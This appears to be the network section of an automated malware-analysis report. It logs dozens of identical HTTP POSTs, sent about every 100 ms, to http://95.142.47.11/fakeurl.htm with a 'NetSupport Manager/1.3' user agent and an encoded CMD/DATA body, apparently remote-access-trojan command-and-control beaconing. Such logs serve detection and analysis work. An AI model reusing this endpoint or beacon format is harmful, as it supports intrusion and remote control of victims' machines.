                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.522411108 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.622051001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.722883940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.823892117 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.923866987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.024934053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.125921011 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.226165056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.326864004 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.427006006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.532601118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.632942915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.733995914 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.834064007 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.934892893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.034991980 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.134949923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.235896111 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.336838007 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.536868095 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.742760897 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.843046904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.943866968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.044961929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.145958900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.246855974 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.347197056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.447932959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.548862934 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.649122953 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.750257969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.850075960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.950860977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.051104069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.151915073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.251894951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.353141069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.453912973 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.554857016 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.656363010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.756875992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.858356953 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.059130907 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.159823895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.260082006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.360919952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.460916042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.567034006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.667118073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.766907930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.867924929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.967969894 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.068129063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.168895006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.269900084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.369883060 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.469881058 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.570611954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.671904087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.771981001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.871845961 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.972029924 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.072932959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.174040079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.273858070 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.374988079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.475886106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.576028109 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.676892042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.777143002 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.877856016 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
